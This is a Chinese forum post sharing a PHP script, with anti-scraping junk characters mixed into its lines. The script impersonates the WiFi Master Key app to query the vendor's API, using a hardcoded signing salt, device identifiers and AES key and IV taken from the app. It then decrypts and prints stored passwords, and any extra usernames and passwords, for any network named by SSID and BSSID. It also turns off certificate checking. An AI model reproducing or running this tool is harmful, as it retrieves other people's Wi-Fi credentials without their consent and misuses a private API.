少尉
- 注册时间
- 2014-1-14
- 金币
- 289 个
- 威望
- 1 个
- 荣誉
- 0 个
累计签到:7 天
连续签到:0 天
[LV.20]漫游旅程
|
代码:2 I: q) p0 e! ?1 z' p/ q& Q7 a
<form action="" method="post">) N! ^: K/ [8 C2 F* y
<p>ssid: <input type="text" name="ssid" /></p>
2 R3 a/ |" p$ Z4 Z, z' B <p>bssid: <input type="text" name="bssid" /></p>
; g9 C6 M9 x+ N6 B <input type="submit" value="提交" />+ r1 B# F Q# u5 Z
</form>! l) |" A& m3 e3 c; ~3 Q0 Z9 o- v
2 e+ d0 ^/ m' V6 L! P
<?php; I4 K$ [% n; u+ q! b. R% ]
$bssid = $_POST["bssid"] ;1 C! J/ k& D' y0 L8 p. D! g! |
$ssid = $_POST["ssid"] ;
/ F$ p# a) g8 O" M$ Hif (isset( $bssid ) && isset( $ssid )){% s; ~2 H5 W! e
//update salt
) D4 L1 S& k: L3 |4 w' |5 ]+ v $ret = request( $bssid , $ssid , md5(rand(1, 10000)));
/ x! I1 U6 G' v, z) ~; w $ret = json_decode( $ret );
) g. [1 p a( x0 ^ E9 V $ret = request( $bssid , $ssid , $ret ->retSn);
* e# h) j- l, o: L1 q8 L* x $ret = json_decode( $ret );$ v4 E' U, t2 f5 G* G8 c- h9 V! B8 {7 x
if ( $ret ->retCd == 0){. \& t6 n ~2 S% Z
if ( $ret ->qryapwd->retCd == 0){
9 C# M4 ]. N9 M/ t' \# i1 ^1 ? $list = $ret ->qryapwd->psws;1 @5 {3 \+ S* |$ E
foreach ( $list as $wifi ){, U7 P, H* r' P5 O1 n" L# y
echo 'SSID: ' . $wifi ->ssid. "<br>" ;
% L* \% n) e/ n8 ?. ]3 h echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;# A( W8 ~- Z9 N7 P% h. N7 q8 k
echo 'BSSID: ' . $wifi ->bssid. "<br>" ;
6 ~+ Z: s' ~: H; p/ G* h& s# W if ( $wifi ->xUser){7 z" r* f V2 s6 p
echo 'xUser: ' . $wifi ->xUser. "<br>" ;; W) z+ K9 v3 M Y0 P, k
echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;7 }# y2 r$ ?! h% M9 u+ b, N! ~
}; n# |& L& ~+ N
}
7 j( b- i( c0 ~7 {( E8 r; M8 L$ H }" z# g Q! q6 Q7 O' n7 f; s+ |
else {
Z3 F( l/ a- l$ M t+ U( e echo $ret ->qryapwd->retMsg;0 J7 H+ {' Z3 F t
}3 o$ u9 O0 ]' K
}
2 W- z, @4 V5 x" T5 g}
/ F* w6 I! Y, Y3 Z2 `. {function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){5 x' ^/ ?( D5 u6 u2 S
$data = array ();& }) r; e1 x; p0 [4 `% r; f, n( l
$data [ 'appid' ] = '0008' ;
; a8 U8 A! h, c" u ? $data [ 'bssid' ] = $bssid ;9 Y- w! k7 o4 Y# ~1 P' \
$data [ 'chanid' ] = 'gw' ;
# `6 s6 N' X3 |, }1 D! `* n: t2 M" G $data [ 'dhid' ] = $dhid ;
3 ~) Y1 W5 V9 e1 G9 ]. u $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;8 A, h* [2 F* d# V2 J: F9 U
$data [ 'lang' ] = 'cn' ;; N; B+ R1 ]& o2 d1 f. e9 s
$data [ 'mac' ] = '60f81dad28dh' ;
5 w4 Y' l# C6 F" `2 U $data [ 'method' ] = 'getDeepSecChkSwitch' ;
& n; ]9 y1 z5 Y $data [ 'pid' ] = 'qryapwd:commonswitch' ;
4 e# E7 E5 ~ } $data [ 'ssid' ] = $ssid ;6 {' R1 C1 d& X0 G# ?
$data [ 'st' ] = 'm' ;) [, ?) N$ y/ D" Y Y4 d
$data [ 'uhid' ] = 'a0000000000000000000000000000002' ;: [( k) M- J" _% J1 v; `
$data [ 'v' ] = '324' ;
- k/ Y( L8 H- ~, N; t) S& e" F0 J $data [ 'sign' ] = sign( $data , $salt );
, F+ O) l$ s9 Q% a- F2 |! s $curl = curl_init();; y! V n1 ^& B1 X- z$ o
curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
' Y: a# ]8 n" H! G" t curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );# d6 Y0 s. U! z e' y, l; L4 O: M5 D
curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
- _( X. ` S+ A7 }" y6 P curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);$ Z4 ^- h5 T$ r9 r
curl_setopt( $curl , CURLOPT_POST, true); // enable posting+ ]7 D0 j- F& b5 L5 X
curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images0 Z. B' C2 X1 v. ^6 I
curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
) h: C( \, G4 z, Y/ ] $r = curl_exec( $curl );. q/ y9 [: j; g3 O) v; y) G6 g: b
curl_close( $curl );
# f( N/ H( \& y return $r ;) |0 V$ R5 P. Z i; O
}
# o7 N+ o/ d' w \function registerNewDevice(){7 P+ m* f8 z2 F/ g
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;. Q/ A* F& x" f |! ?4 V" h8 Q
$data = array ();
$ `+ X2 S' A; n/ w& b; {- C$ I$ Z $data [ 'appid' ] = '0008' ;
3 N/ ^8 w i6 y; m8 N $data [ 'bssid' ] = $bssid ;
8 T) f/ f8 p& ~& O" L. D $data [ 'chanid' ] = 'gw' ;# p! o6 B( l) L0 S; \, z! k4 S Y
$data [ 'dhid' ] = $dhid ;* ?$ ~1 s5 u1 l7 K; e0 Z7 J* K9 v
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;2 a# c6 L! Q0 B" l4 M$ _/ o+ l+ L
$data [ 'lang' ] = 'cn' ;5 T j9 M2 e/ t/ m% ~% d7 O$ o
$data [ 'mac' ] = '60f81dad28de' ;9 }# t2 H( S# D/ \! f
$data [ 'method' ] = 'getDeepSecChkSwitch' ;) k5 A9 X8 C( o" z4 Z- I9 W6 |
$data [ 'pid' ] = 'qryapwd:commonswitch' ; V6 x4 j$ F0 s2 u) r8 d! c# S+ c
$data [ 'ssid' ] = $ssid ;; j0 l0 S5 }0 y# J3 W/ j& L
$data [ 'st' ] = 'm' ;& l* p4 ]* H* I9 c5 S# B
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;3 k6 l. S) ~1 D
$data [ 'v' ] = '324' ;
! F2 L3 [; _7 S# a- J' X $data [ 'sign' ] = sign( $data , $salt );
" z. U) L4 a% i4 D( |# R# r7 m8 o" o}
5 a/ G. s8 e: o- D- ~5 {function sign( $array , $salt ){" t% p1 m9 |- L3 ?* _
// 签名算法
6 O) \0 I0 N3 D $request_str = '' ;
, i2 w' r( Y q5 h k // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
1 G+ z; j, P" W b7 e' l# {" J' m ksort( $array );
3 W6 q5 A6 v& e" {7 N8 B/ [ foreach ( $array as $key => $value ) {
1 l3 o; [3 N# M $request_str .= $value ;! x" @/ G8 t! ^) D6 R
}9 S5 K$ [' A3 ?$ f, h. G/ @
$sign = md5( $request_str . $salt );
/ M: W' [8 i( g5 j+ D( B return strtoupper ( $sign );
$ y: H. N/ S% c+ p9 g- K+ b4 c}
& @2 g+ q! `# O! A7 V; {function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
# u) h5 @9 \: }( j. `/ t //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密0 c7 }4 W* ^/ `& q( |2 K
//[length][password][timestamp]" v8 U4 Q; P) _/ Z+ x, k# T
$decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );+ [6 N% a8 C5 j) ?1 j: s
return substr (trim( $decrypted_string ),3,-13);4 W0 N+ m9 o' n, F
} ?>可惜每天限制了查询次数!; K+ ^9 K9 _4 z) K
截图:- {9 P7 d% n; ?& C5 e
# g1 ^4 y/ T1 C% c! h6 q! n
我的博客:www.bluexiang.com
7 F& [. x: d: W( G H. V; U# ]2 ~1 u- D
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
2
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-21 13:51
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
